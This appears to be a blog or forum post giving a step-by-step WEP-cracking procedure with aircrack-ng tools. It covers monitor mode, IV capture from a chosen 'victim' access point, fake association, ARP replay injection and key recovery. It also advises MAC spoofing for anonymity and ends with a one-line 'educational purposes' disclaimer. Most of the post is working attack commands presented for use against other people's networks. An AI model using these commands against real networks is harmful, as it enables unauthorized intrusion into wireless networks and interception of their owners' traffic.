I've been trying different combinations of cracking a WEP key. Each "experiment" requires a different strategy, each subject needs to be poked a little different from the other. The instructions below might or might not work. But it does work most of the time. It works very well when a client is connected to the AP, but of course you can fake that also.
I recommend changing you monitoring interface's MAC address for anonymity and to make is easy to remember - example 11:22:33:44:55:66 You can use MACCHANGER if needed.
1. set the interface in monitor mode - airmon-ng [interface]
2. to recon the air waves use airodump-ng: airodump-ng [interface]
3. pick the victim and take note of the SSID, channel and mac address.
4. stop airodump-ng, then restart it with the write option to start catching the IVs. - airodump-ng -c [channel] -w [filename] [interface]
5. Now we need to inject some "care packages" to generate some IV's. This is were you should get creative. Take your pick.
NOTE: to test the subjects's ability for packet injection, use the following code. you are looking for a 100% injection result - aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]
fake associations for the vic. ap
aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface] or use this for picky access points
aireplay-ng -1 6000 -o 1 -q 10 e [vic ssid] -a [vic mac] -h [your mac] [interface]
you have to get a successful association before you can continue. your ARP request replay packets will not generate any IV's if you are not associated with the AP.
send out ARP request replay modes
aireplay-ng -3 -b [vic mac] -h [your mac] [interface]
6. Start cracking -aircrack-ng [filename] pick the vic SSID then go.
Note: you can use the FMS/Korek method by adding -K on the code above.
You will need approx. 250,000 IV's for a 64 bit key, 1.5M IV's for a 128 bit key. for the PTW method, you'll need 20,000 packets for 64bit and 40,000 packets for 128bits.
"This is strictly for educational purposes only. Setup you own lap or crack you own Wifi for pen testing purposes.
